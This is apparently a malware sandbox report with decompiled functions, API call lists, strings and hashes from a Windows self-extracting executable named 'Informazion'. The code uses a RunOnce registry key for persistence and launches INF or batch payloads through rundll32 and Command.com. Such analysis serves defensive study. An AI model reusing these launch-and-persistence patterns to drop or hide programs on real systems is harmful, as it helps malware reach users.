				 *((long long*)(_t217 + 0x60)) = 0x4c51d610;
				 *((short*)(_t217 + 0x70)) =  *0x4c51de78 & 0x0000ffff;
				_t111 =  *0x4c51cd18 & 0x0000ffff;
				 *((long long*)(_t217 + 0x68)) = _t214 - 0x10;
				 *(_t217 + 0x48) = _t230;
				 *((long long*)(_t217 + 0x58)) =  *((intOrPtr*)(_t217 + 0x38));
				 *(_t217 + 0x74) = _t111;
				if (_t153 == 0) goto 0x4c51441f;
				asm("bts ecx, 0x10");
				 *(_t217 + 0x74) = _t111;
				_t93 =  *0x4c51de64; // 0x1
				if ((_t93 & 0x00000008) == 0) goto 0x4c514431;
				asm("bts ecx, 0x11");
				 *(_t217 + 0x74) = _t111;
				if ((_t93 & 0x00000010) == 0) goto 0x4c51443d;
				asm("bts ecx, 0x12");
				 *(_t217 + 0x74) = _t111;
				_t94 =  *0x4c51d028; // 0x0
				if ((_t94 & 0x00000040) == 0) goto 0x4c51444f;
				asm("bts ecx, 0x13");
				 *(_t217 + 0x74) = _t111;
				if (_t94 >= 0) goto 0x4c51445b;
				asm("bts ecx, 0x14");
				 *(_t217 + 0x74) = _t111;
				_t95 =  *0x4c51de68; // 0x0
				 *((intOrPtr*)(_t217 + 0x78)) = _t95;
				_t96 =  *0x4c519650();
				 *0x4c51d544 = _t96;
				if (_t96 < 0) goto 0x4c5144d3;
				FreeLibrary(_t213);
				goto 0x4c5144ad;
				if ( *((intOrPtr*)(_t217 + 0x38)) == 0) goto 0x4c5144df;
				_t98 = E00007FF67FF64C51473C(1,  *((intOrPtr*)(_t217 + 0x38)),  *((intOrPtr*)(_t217 + 0x38)), _t214 - 0x80); // executed
				if (_t98 == 0) goto 0x4c5144df;
				LocalFree(??);
				r14d = r14d + 1;
				if (r14d - 2 >= 0) goto 0x4c5145d8;
				goto 0x4c514145;
				FreeLibrary(??);
				LocalFree(??);
				return E00007FF67FF64C518470(0, _t111,  *(_t214 + 0x450) ^ _t217);
			}

0x7ff64c5140c4
0x7ff64c5140c4
0x7ff64c5140c4
0x7ff64c5140c4
0x7ff64c5140c7
0x7ff64c5140cb
0x7ff64c5140cf
0x7ff64c5140dc
0x7ff64c5140e3
0x7ff64c5140ea
0x7ff64c5140f4
0x7ff64c5140fb
0x7ff64c5140fe
0x7ff64c514105
0x7ff64c514108
0x7ff64c51410b
0x7ff64c514112
0x7ff64c514112
0x7ff64c514116
0x7ff64c514118
0x7ff64c514118
0x7ff64c514133
0x7ff64c514139
0x7ff64c514147
0x7ff64c514150
0x7ff64c514154
0x7ff64c514159
0x7ff64c514160
0x7ff64c514167
0x7ff64c51416d
0x7ff64c514188
0x7ff64c51418e
0x7ff64c514194
0x7ff64c514196
0x7ff64c51419b
0x7ff64c5141a0
0x7ff64c5141a7
0x7ff64c5141ab
0x7ff64c5141af
0x7ff64c5141b1
0x7ff64c5141b5
0x7ff64c5141bb
0x7ff64c5141c1
0x7ff64c5141cb
0x7ff64c5141d0
0x7ff64c5141d9
0x7ff64c5141dd
0x7ff64c5141ea
0x7ff64c5141fb
0x7ff64c514204
0x7ff64c514208
0x7ff64c51420b
0x7ff64c51421b
0x7ff64c51422d
0x7ff64c514234
0x7ff64c51423a
0x7ff64c514240
0x7ff64c514252
0x7ff64c514254
0x7ff64c514259
0x7ff64c51425c
0x7ff64c51425f
0x7ff64c51426e
0x7ff64c514273
0x7ff64c51427d
0x7ff64c514295
0x7ff64c514299
0x7ff64c5142a3
0x7ff64c5142a5
0x7ff64c5142a9
0x7ff64c5142ab
0x7ff64c5142ad
0x7ff64c5142af
0x7ff64c5142b5
0x7ff64c5142be
0x7ff64c5142c2
0x7ff64c5142c8
0x7ff64c5142ca
0x7ff64c5142e2
0x7ff64c5142e8
0x7ff64c5142ef
0x7ff64c5142f5
0x7ff64c5142fc
0x7ff64c514300
0x7ff64c514303
0x7ff64c514322
0x7ff64c514336
0x7ff64c51433d
0x7ff64c514343
0x7ff64c51434a
0x7ff64c51434c
0x7ff64c514353
0x7ff64c514355
0x7ff64c51435c
0x7ff64c514360
0x7ff64c514362
0x7ff64c514365
0x7ff64c51436c
0x7ff64c514372
0x7ff64c514379
0x7ff64c514381
0x7ff64c51438e
0x7ff64c514394
0x7ff64c51439f
0x7ff64c5143af
0x7ff64c5143c1
0x7ff64c5143c7
0x7ff64c5143e1
0x7ff64c5143ed
0x7ff64c5143f6
0x7ff64c5143fb
0x7ff64c514402
0x7ff64c514407
0x7ff64c51440c
0x7ff64c514411
0x7ff64c514415
0x7ff64c514417
0x7ff64c51441b
0x7ff64c51441f
0x7ff64c514427
0x7ff64c514429
0x7ff64c51442d
0x7ff64c514433
0x7ff64c514435
0x7ff64c514439
0x7ff64c51443d
0x7ff64c514445
0x7ff64c514447
0x7ff64c51444b
0x7ff64c514451
0x7ff64c514453
0x7ff64c514457
0x7ff64c51445b
0x7ff64c514466
0x7ff64c51446d
0x7ff64c514473
0x7ff64c51447e
0x7ff64c514480
0x7ff64c514491
0x7ff64c51449b
0x7ff64c5144a4
0x7ff64c5144ab
0x7ff64c5144b0
0x7ff64c5144bc
0x7ff64c5144c3
0x7ff64c5144ce
0x7ff64c5144d3
0x7ff64c5144e2
0x7ff64c51451f

APIs

memset.MSVCRT ref: 00007FF64C514154
CompareStringA.KERNEL32 ref: 00007FF64C51421B

Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

CompareStringA.KERNEL32 ref: 00007FF64C514313
GetProcAddress.KERNEL32 ref: 00007FF64C5143AF
FreeLibrary.KERNEL32 ref: 00007FF64C514480
LocalFree.KERNEL32 ref: 00007FF64C5144B0
FreeLibrary.KERNEL32 ref: 00007FF64C5144D3
LocalFree.KERNEL32 ref: 00007FF64C5144E2

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C5143E6, 00007FF64C5146B3
DoInfInstall, xrefs: 00007FF64C5143A5, 00007FF64C514526
wextract_cleanup0, xrefs: 00007FF64C514636, 00007FF64C5146F9
SHOWWINDOW, xrefs: 00007FF64C514178
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF64C5146C9
<None>, xrefs: 00007FF64C5141FD, 00007FF64C5142F5
POSTRUNPROGRAM, xrefs: 00007FF64C5142D4
advpack.dll, xrefs: 00007FF64C514579
REBOOT, xrefs: 00007FF64C514123
RUNPROGRAM, xrefs: 00007FF64C514244
ADMQCMD, xrefs: 00007FF64C5141D2
Maintal, xrefs: 00007FF64C5143CE
USRQCMD, xrefs: 00007FF64C5141E3
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF64C514605

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$Maintal$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 2679723528-456226487
Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
Instruction ID: d9c2cdb3898b70f87e8a094213bf06ea7287a23c6490a2cb3b27d7070a1b8062
Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
Instruction Fuzzy Hash: D3027A75E0C68286EB28BF18A8486BD7FA0FB84754F442137DA6E82794DF7CE565C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C511D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183
registrylibrarymemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E00007FF67FF64C511D28(long long __rbx, long long __rdi, long long __rsi, void* __r9) {
				void* __rbp;
				long _t51;
				long _t53;
				void* _t61;
				signed int _t62;
				void* _t87;
				void* _t105;
				signed long long _t106;
				signed long long _t110;
				void* _t112;
				signed int _t114;
				signed long long _t117;
				signed long long _t118;
				void* _t135;
				signed int _t153;
				long long _t155;
				int _t157;
				void* _t160;
				signed long long _t161;
				void* _t170;
				int _t172;
				void* _t175;

				_t168 = __r9;
				_t155 = __rsi;
				_t105 = _t160;
				 *((long long*)(_t105 + 8)) = __rbx;
				 *((long long*)(_t105 + 0x10)) = __rsi;
				 *((long long*)(_t105 + 0x18)) = __rdi;
				_t158 = _t105 - 0x1a8;
				_t161 = _t160 - 0x290;
				_t106 =  *0x4c51c008; // 0xdeba5460e397
				 *(_t105 - 0x1a8 + 0x180) = _t106 ^ _t161;
				r8d = 0x104;
				memset(_t175, _t172, _t157);
				r8d = 0x104;
				memset(??, ??, ??);
				r14d = 0;
				 *((long long*)(_t161 + 0x40)) = _t161 + 0x58;
				r9d = 0;
				 *((long long*)(_t161 + 0x38)) = _t161 + 0x50;
				r8d = 0;
				 *(_t161 + 0x30) =  *(_t161 + 0x30) & _t175;
				 *(_t161 + 0x28) = 0x2001f;
				 *(_t161 + 0x20) =  *(_t161 + 0x20) & r14d;
				_t51 = RegCreateKeyExA(??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
				if (_t51 != 0) goto 0x4c512019;
				_t17 = _t155 - 0x3c; // 0xc8
				_t87 = _t17;
				r9d = 0;
				E00007FF67FF64C51114C(0x4c51c7d0, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "wextract_cleanup%d", __r9);
				_t110 = _t161 + 0x5c;
				 *(_t161 + 0x28) = _t110;
				 *(_t161 + 0x20) =  *(_t161 + 0x20) & _t175;
				r9d = 0;
				r8d = 0;
				_t53 = RegQueryValueExA(??, ??, ??, ??, ??, ??); // executed
				if (_t53 != 0) goto 0x4c511e25;
				if (1 - _t87 < 0) goto 0x4c511dd3;
				if (1 != _t87) goto 0x4c511e46;
				RegCloseKey(??);
				 *0x4c51c7d0 = r14b;
				goto 0x4c512019;
				GetSystemDirectoryA(??, ??);
				E00007FF67FF64C517BA8(0x104, _t110, __rbx, _t105 - 0x1a8 + 0x70, __rsi, _t158, "advpack.dll");
				LoadLibraryA(??); // executed
				if (_t110 == 0) goto 0x4c511f55;
				GetProcAddress(??, ??);
				_t117 = _t110;
				r14b = _t110 != 0;
				FreeLibrary(??); // executed
				if (_t117 == 0) goto 0x4c511f55;
				if (GetSystemDirectoryA(??, ??) == 0) goto 0x4c511ee8;
				_t61 = E00007FF67FF64C517BA8(0x104, _t110, _t117, _t161 + 0x60, _t155, _t158, 0x4c519700);
				_t118 = _t117 | 0xffffffff;
				_t112 = _t118 + 1;
				if ( *((char*)(_t112 + 0x4c51d610)) != 0) goto 0x4c511ef6;
				_t135 = _t118 + 1;
				if ( *((char*)(_t161 + 0x60 + _t135)) != 0) goto 0x4c511f08;
				_t114 = _t112 + 0x50 + _t135;
				_t62 = LocalAlloc(??, ??);
				_t153 = _t114;
				if (_t114 != 0) goto 0x4c511f8e;
				 *(_t161 + 0x28) =  *(_t161 + 0x28) & _t62;
				r9d = 0;
				r8d = 0;
				 *(_t161 + 0x20) = 0x10;
				E00007FF67FF64C514DCC(_t135, 0x4c519700, _t168, _t170);
				goto 0x4c511f78;
				r8d = _t61;
				if (GetModuleFileNameA(??, ??, ??) != 0) goto 0x4c511ee8;
				RegCloseKey(??);
				goto 0x4c512019;
				 *(_t161 + 0x20) = 0x4c51d610;
				 *0x4c51c820 = r14d ^ 0x00000001;
				_t167 =  !=  ? "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"" : "%s /D:%s";
				E00007FF67FF64C51114C(_t153, _t155,  !=  ? "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"" : "%s /D:%s", _t161 + 0x60);
				if ( *((char*)(_t153 + _t118 + 1)) != 0) goto 0x4c511fc4;
				r9d = 1;
				 *(_t161 + 0x28) = 2;
				r8d = 0;
				 *(_t161 + 0x20) = _t153;
				RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
				RegCloseKey(??); // executed
				return E00007FF67FF64C518470(LocalFree(??), 0,  *(_t158 + 0x180) ^ _t161);
			}

0x7ff64c511d28
0x7ff64c511d28
0x7ff64c511d28
0x7ff64c511d2b
0x7ff64c511d2f
0x7ff64c511d33
0x7ff64c511d3c
0x7ff64c511d43
0x7ff64c511d4a
0x7ff64c511d54
0x7ff64c511d65
0x7ff64c511d6a
0x7ff64c511d6f
0x7ff64c511d78
0x7ff64c511d82
0x7ff64c511d85
0x7ff64c511d96
0x7ff64c511d99
0x7ff64c511d9e
0x7ff64c511da1
0x7ff64c511dad
0x7ff64c511db5
0x7ff64c511dba
0x7ff64c511dc8
0x7ff64c511dd0
0x7ff64c511dd0
0x7ff64c511dd3
0x7ff64c511de9
0x7ff64c511df3
0x7ff64c511df8
0x7ff64c511e04
0x7ff64c511e09
0x7ff64c511e0c
0x7ff64c511e0f
0x7ff64c511e1d
0x7ff64c511e23
0x7ff64c511e27
0x7ff64c511e2e
0x7ff64c511e3a
0x7ff64c511e41
0x7ff64c511e4c
0x7ff64c511e65
0x7ff64c511e6e
0x7ff64c511e80
0x7ff64c511e90
0x7ff64c511ea2
0x7ff64c511ea5
0x7ff64c511ea9
0x7ff64c511eb8
0x7ff64c511ed3
0x7ff64c511ee3
0x7ff64c511ee8
0x7ff64c511ef6
0x7ff64c511efe
0x7ff64c511f08
0x7ff64c511f0f
0x7ff64c511f15
0x7ff64c511f21
0x7ff64c511f2d
0x7ff64c511f33
0x7ff64c511f35
0x7ff64c511f39
0x7ff64c511f3c
0x7ff64c511f3f
0x7ff64c511f4e
0x7ff64c511f53
0x7ff64c511f61
0x7ff64c511f72
0x7ff64c511f7d
0x7ff64c511f89
0x7ff64c511f91
0x7ff64c511fa0
0x7ff64c511fbb
0x7ff64c511fbf
0x7ff64c511fcb
0x7ff64c511fdb
0x7ff64c511fe1
0x7ff64c511fe5
0x7ff64c511fe8
0x7ff64c511fed
0x7ff64c511ffe
0x7ff64c512044

APIs

memset.MSVCRT ref: 00007FF64C511D6A
memset.MSVCRT ref: 00007FF64C511D78
RegCreateKeyExA.KERNELBASE ref: 00007FF64C511DBA

Part of subcall function 00007FF64C51114C: _vsnprintf.MSVCRT ref: 00007FF64C511189

RegQueryValueExA.KERNELBASE ref: 00007FF64C511E0F
RegCloseKey.ADVAPI32 ref: 00007FF64C511E2E
GetSystemDirectoryA.KERNEL32 ref: 00007FF64C511E4C
LoadLibraryA.KERNELBASE ref: 00007FF64C511E6E
GetProcAddress.KERNEL32 ref: 00007FF64C511E90
FreeLibrary.KERNELBASE ref: 00007FF64C511EA9
GetSystemDirectoryA.KERNEL32 ref: 00007FF64C511EC5
LocalAlloc.KERNEL32 ref: 00007FF64C511F21
GetModuleFileNameA.KERNEL32 ref: 00007FF64C511F64
RegCloseKey.ADVAPI32 ref: 00007FF64C511F7D
RegSetValueExA.KERNELBASE ref: 00007FF64C511FED
RegCloseKey.KERNELBASE ref: 00007FF64C511FFE
LocalFree.KERNEL32 ref: 00007FF64C51200D

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C511EEC
DelNodeRunDLL32, xrefs: 00007FF64C511E86
wextract_cleanup%d, xrefs: 00007FF64C511DD6
wextract_cleanup0, xrefs: 00007FF64C511DE2, 00007FF64C511DFD, 00007FF64C511FD2
%s /D:%s, xrefs: 00007FF64C511F99
advpack.dll, xrefs: 00007FF64C511E58
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF64C511FAE
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF64C511D8A

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-3726664654
Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
Instruction ID: 800245bac096a5c29b2cd218871175b14795ca5d4f726914906367460b52aca6
Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
Instruction Fuzzy Hash: 54814C36E0CA8186EB14BF19E8482BEBBA0FB89B54F445136D96E83754DF3CE125C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C511684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00007FF67FF64C511684(intOrPtr __ebx, signed long long __rbx, void* __rcx, void* __rdx, long long* __r8, intOrPtr* __r9) {
				void* __rsi;
				void* __rbp;
				char _t81;
				intOrPtr _t83;
				char _t84;
				char _t85;
				int _t96;
				signed char _t109;
				char _t110;
				char _t113;
				intOrPtr _t117;
				char _t143;
				char _t154;
				char _t157;
				void* _t161;
				void* _t168;
				char _t179;
				char _t184;
				signed long long _t187;
				long long _t194;
				void* _t196;
				intOrPtr* _t204;
				long long _t206;
				long long _t208;
				long long _t210;
				signed long long _t217;
				long long _t219;
				void* _t220;
				long long _t222;
				char* _t225;
				void* _t226;
				char* _t228;
				void* _t229;
				char* _t230;
				void* _t240;
				char* _t250;
				void* _t251;
				char* _t262;
				void* _t272;
				char* _t276;
				void* _t277;
				int _t279;
				intOrPtr* _t280;
				char* _t281;
				void* _t282;
				void* _t284;
				CHAR* _t287;
				long long _t288;
				intOrPtr _t289;
				intOrPtr* _t290;
				CHAR* _t292;
				void* _t293;
				void* _t295;
				signed long long _t296;
				CHAR* _t324;
				long long* _t325;
				char* _t327;
				int _t329;
				void* _t330;
				char* _t332;
				int _t335;

				_t259 = __rdx;
				_t217 = __rbx;
				_t117 = __ebx;
				 *((long long*)(_t295 + 0x10)) = __rbx;
				_t293 = _t295 - 0x570;
				_t296 = _t295 - 0x670;
				_t187 =  *0x4c51c008; // 0xdeba5460e397
				 *(_t293 + 0x560) = _t187 ^ _t296;
				_t330 = __rcx;
				_t225 = _t293 + 0x50;
				_t323 = __rcx - _t293 + 0x50;
				r13d = 0;
				_t325 = __r8;
				_t6 = _t259 + 0x7ffffefa; // 0x7ffffffe
				if (_t6 == 0) goto 0x4c5116f2;
				_t81 =  *((intOrPtr*)(__rcx - _t293 + 0x50 + _t225));
				_t143 = _t81;
				if (_t143 == 0) goto 0x4c5116f2;
				 *_t225 = _t81;
				_t226 = _t225 + 1;
				if (_t143 != 0) goto 0x4c5116d3;
				_t192 =  !=  ? _t226 : _t226 - 1;
				 *((intOrPtr*)( !=  ? _t226 : _t226 - 1)) = r13b;
				if ( *((char*)(_t293 + 0x50)) != 0x22) goto 0x4c511713;
				goto 0x4c51171e;
				_t262 = " ";
				_t194 = _t293 + 0x50;
				 *((long long*)(_t296 + 0x30)) = _t194;
				E00007FF67FF64C5115E8(_t194, __rbx, _t296 + 0x30, _t262, _t287, _t293);
				_t280 =  *((intOrPtr*)(_t296 + 0x30));
				_t288 = _t194;
				if (_t280 == 0) goto 0x4c5117aa;
				_t196 = (_t217 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t280 + _t196)) != r13b) goto 0x4c511741;
				if (_t196 - 3 < 0) goto 0x4c5117aa;
				_t83 =  *((intOrPtr*)(_t280 + 1));
				if (_t83 != 0x3a) goto 0x4c51175e;
				if ( *((intOrPtr*)(_t280 + 2)) == 0x5c) goto 0x4c511766;
				if ( *_t280 != 0x5c) goto 0x4c5117aa;
				if (_t83 != 0x5c) goto 0x4c5117aa;
				_t228 = _t296 + 0x40;
				_t20 = _t262 + 0x7ffffefa; // 0x7ffffffe
				if (_t20 == 0) goto 0x4c51179a;
				_t84 =  *((intOrPtr*)(_t280 - _t296 + 0x40 + _t228));
				_t154 = _t84;
				if (_t154 == 0) goto 0x4c51179a;
				 *_t228 = _t84;
				_t229 = _t228 + 1;
				if (_t154 != 0) goto 0x4c51177b;
				_t200 =  !=  ? _t229 : _t229 - 1;
				 *((intOrPtr*)( !=  ? _t229 : _t229 - 1)) = r13b;
				goto 0x4c511804;
				r9d = 0x104;
				_t230 = _t296 + 0x40;
				if (_t262 - 1 + 0x7ffffefa == 0) goto 0x4c5117e6;
				_t85 =  *((intOrPtr*)(0x4c51d610 - _t296 + 0x40 + _t230));
				_t157 = _t85;
				if (_t157 == 0) goto 0x4c5117e6;
				 *_t230 = _t85;
				if (_t157 != 0) goto 0x4c5117c7;
				_t204 =  !=  ? _t230 + 1 : _t230 + 1 - 1;
				 *_t204 = r13b;
				E00007FF67FF64C517BA8(r9d, _t204, _t217 | 0xffffffff, _t296 + 0x40, _t288, _t293, _t280);
				E00007FF67FF64C517D68(0x2e, _t204, _t217 | 0xffffffff, _t280, _t288, _t293);
				if (_t204 == 0) goto 0x4c511a1b;
				 *((intOrPtr*)(_t296 + 0x28)) = _t117;
				 *((long long*)(_t296 + 0x20)) = ".INF";
				r9d = _t117;
				if (CompareStringA(_t335, _t329, _t327) != 2) goto 0x4c511a1b;
				_t161 = GetFileAttributesA(_t324) - 0xffffffff;
				if (_t161 == 0) goto 0x4c5119f3;
				if (_t161 == 0) goto 0x4c5119f3;
				 *((long long*)(_t296 + 0x30)) = _t288;
				E00007FF67FF64C5115E8(_t204, _t217 | 0xffffffff, _t296 + 0x30, "[", _t288, _t293);
				if (_t204 == 0) goto 0x4c5118b5;
				_t206 =  !=  ? _t204 :  *((intOrPtr*)(_t296 + 0x30));
				 *((long long*)(_t296 + 0x30)) = _t206;
				E00007FF67FF64C5115E8(_t206, _t217 | 0xffffffff, _t296 + 0x30, "]", _t288, _t293);
				LocalAlloc(_t279);
				_t219 = _t206;
				if (_t206 == 0) goto 0x4c511aa2;
				_t289 =  *((intOrPtr*)(_t296 + 0x30));
				_t281 = "DefaultInstall";
				_t240 =  !=  ? _t289 : _t281;
				r8d = 0;
				_t96 = GetPrivateProfileIntA(_t287, _t292);
				 *__r9 = 1;
				 *0x4c51d540 = _t96;
				 *((long long*)(_t296 + 0x28)) = _t296 + 0x40;
				 *((intOrPtr*)(_t296 + 0x20)) = 8;
				if (GetPrivateProfileStringA(??, ??, ??, ??, ??, ??) == 0) goto 0x4c511984;
				 *0x4c51de64 =  *0x4c51de64 | 0x00000004;
				_t282 =  !=  ? _t289 : _t281;
				E00007FF67FF64C511008(_t330, "AdvancedINF", _t282, _t323);
				E00007FF67FF64C511008(_t219, "AdvancedINF", _t296 + 0x40, _t323);
				goto 0x4c511bd1;
				 *0x4c51de64 =  *0x4c51de64 & 0xfffffffb;
				_t168 =  *0x4c51de78 - r13w; // 0x3
				if (_t168 != 0) goto 0x4c5119ba;
				r8d = 0x104;
				GetShortPathNameA(??, ??, ??);
				goto 0x4c5119c1;
				_t332 = "setupapi.dll";
				_t208 = _t296 + 0x40;
				 *((long long*)(_t296 + 0x28)) = _t208;
				_t283 =  !=  ? _t289 : _t282;
				 *((long long*)(_t296 + 0x20)) =  !=  ? _t289 : _t282;
				E00007FF67FF64C51114C(_t219, _t296 + 0x40, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t332);
				goto 0x4c511bd1;
				r9d = 0;
				 *((intOrPtr*)(_t296 + 0x28)) = r13d;
				 *((intOrPtr*)(_t296 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC(_t219, _t296 + 0x40, _t332, _t323);
				goto 0x4c511bda;
				E00007FF67FF64C517D68(0x2e, _t208, _t219,  !=  ? _t289 : _t282, _t289, _t293);
				if (_t208 == 0) goto 0x4c511acb;
				 *((intOrPtr*)(_t296 + 0x28)) = _t117;
				 *((long long*)(_t296 + 0x20)) = ".BAT";
				r9d = _t117;
				if (CompareStringA(??, ??, ??, ??, ??, ??) != 2) goto 0x4c511acb;
				_t290 = "Command.com /c %s";
				_t210 = _t219 + 1;
				if ( *((intOrPtr*)(_t290 + _t210)) != r13b) goto 0x4c511a6a;
				_t220 = _t219 + 1;
				if ( *((intOrPtr*)(_t296 + 0x40 + _t220)) != r13b) goto 0x4c511a78;
				_t284 = _t210 + _t220;
				LocalAlloc(??, ??);
				if (_t210 != 0) goto 0x4c511ab2;
				r9d = 0;
				r8d = 0;
				goto 0x4c511a00;
				_t272 = _t284 + 8;
				E00007FF67FF64C51114C(_t210, _t272, _t290, _t296 + 0x40);
				goto 0x4c511bd1;
				LocalAlloc(??, ??);
				_t222 = _t210;
				if (_t210 == 0) goto 0x4c511aa2;
				_t109 = GetFileAttributesA(??); // executed
				if (_t109 == 0xffffffff) goto 0x4c511b7e;
				if ((_t109 & 0x00000010) != 0) goto 0x4c511b7e;
				_t250 = _t293 + 0x160;
				_t68 = _t272 + 0x7ffffbfe; // 0x7ffffffe
				if (_t68 == 0) goto 0x4c511b3c;
				_t110 =  *((intOrPtr*)(_t250 + _t296 + 0x40 - _t293 + 0x160));
				_t179 = _t110;
				if (_t179 == 0) goto 0x4c511b3c;
				 *_t250 = _t110;
				_t251 = _t250 + 1;
				if (_t179 != 0) goto 0x4c511b1d;
				_t214 =  !=  ? _t251 : _t251 - 1;
				 *((intOrPtr*)( !=  ? _t251 : _t251 - 1)) = r13b;
				if (_t290 == 0) goto 0x4c511bbc;
				if ( *_t290 == r13b) goto 0x4c511bbc;
				E00007FF67FF64C511084(_t293 + 0x160, _t284, " ");
				E00007FF67FF64C511084(_t293 + 0x160, _t284, _t290);
				goto 0x4c511bbc;
				_t276 = _t293 + 0x160;
				_t75 = _t284 + 0x7ffffbfe; // 0x7ffffffe
				if (_t75 == 0) goto 0x4c511bae;
				_t113 =  *((intOrPtr*)(_t276 + _t332 - _t293 + 0x160));
				_t184 = _t113;
				if (_t184 == 0) goto 0x4c511bae;
				 *_t276 = _t113;
				_t277 = _t276 + 1;
				if (_t184 != 0) goto 0x4c511b8f;
				_t255 =  !=  ? _t277 : _t277 - 1;
				 *((intOrPtr*)( !=  ? _t277 : _t277 - 1)) = r13b;
				 *_t222 = r13b;
				E00007FF67FF64C512A6C(_t222, _t293 + 0x160, _t222, _t222);
				 *_t325 = _t222;
				return E00007FF67FF64C518470(1, 0x40,  *(_t293 + 0x560) ^ _t296);
			}

0x7ff64c511684
0x7ff64c511684
0x7ff64c511684
0x7ff64c511684
0x7ff64c511694
0x7ff64c51169c
0x7ff64c5116a3
0x7ff64c5116ad
0x7ff64c5116b4
0x7ff64c5116be
0x7ff64c5116c2
0x7ff64c5116c8
0x7ff64c5116cb
0x7ff64c5116d3
0x7ff64c5116dd
0x7ff64c5116df
0x7ff64c5116e3
0x7ff64c5116e5
0x7ff64c5116e7
0x7ff64c5116e9
0x7ff64c5116f0
0x7ff64c5116f9
0x7ff64c5116fd
0x7ff64c511704
0x7ff64c511711
0x7ff64c511713
0x7ff64c51171a
0x7ff64c511723
0x7ff64c511728
0x7ff64c51172d
0x7ff64c511736
0x7ff64c51173c
0x7ff64c511741
0x7ff64c511748
0x7ff64c51174e
0x7ff64c511750
0x7ff64c511757
0x7ff64c51175c
0x7ff64c511760
0x7ff64c511764
0x7ff64c511771
0x7ff64c51177b
0x7ff64c511785
0x7ff64c511787
0x7ff64c51178b
0x7ff64c51178d
0x7ff64c51178f
0x7ff64c511791
0x7ff64c511798
0x7ff64c5117a1
0x7ff64c5117a5
0x7ff64c5117a8
0x7ff64c5117aa
0x7ff64c5117c2
